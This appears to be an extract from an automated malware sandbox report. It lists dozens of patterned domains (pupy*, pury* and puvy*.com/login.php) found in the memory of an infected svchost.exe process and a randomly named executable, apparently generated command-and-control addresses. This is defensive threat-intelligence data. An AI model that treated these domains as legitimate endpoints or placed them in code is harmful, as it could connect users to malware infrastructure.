Source: svchost.exe, 00000002.00000003.2385477507.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupyteg.com/login.php
Source: svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671484952.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupytiq.com/login.php
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296776136.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296803931.00000000086F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupytyl.com/login.php
Source: svchost.exe, 00000002.00000003.2318282054.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458870.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298951843.00000000086D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305813558.00000000008F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupywog.com/login.php
Source: svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635826907.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupyxal.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2391261344.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267123963.0000000003347000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384383810.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupyxuq.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321367524.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320123040.0000000008611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purybav.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3283281392.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151831540.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2156423614.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153845839.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396706488.00000000086F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397272204.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151605214.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395827509.00000000086EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2167507417.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157083075.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152200523.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2408435581.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157306310.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2554600445.00000000015E8000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2733416103.00000000096C4000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2670340730.0000000009290000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2670340730.0000000009356000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2767328417.0000000008768000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://purydyv.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purygeg.com/login.php
Source: svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puryjeq.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393602354.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2800821291.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purylal.com/login.php
Source: svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purylup.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2764486074.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purymog.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558551911.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458885.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307211585.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purymuq.com/login.php
Source: svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339131570.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347564818.00000000033D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purytov.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purytyp.com/login.php
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296876973.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296776136.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2297408732.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296803931.00000000086F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purywop.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purywyl.com/login.php
Source: svchost.exe, 00000002.00000003.2334859023.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337099007.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337298832.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336690325.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puryxag.com/login.php
Source: svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433469264.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430808473.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557475743.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577719348.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393602354.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548810720.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202332641.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578793071.0000000008786000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puryxuq.com/login.php
Source: svchost.exe, 00000002.00000003.2681961070.000000000866F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvybuv.com/H
Source: svchost.exe, 00000002.00000003.2681961070.000000000866F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvybuv.com/http://puvybuv.com/
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458885.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307211585.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvycip.com/login.php
Source: svchost.exe, 00000002.00000003.2318282054.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458870.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458885.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321434222.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323657176.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305813558.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307211585.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvydov.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671356551.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671484952.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvygog.com/login.php
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296551987.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296876973.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2297408732.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298813609.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvygyq.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2391261344.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puvyjiq.com/login.php
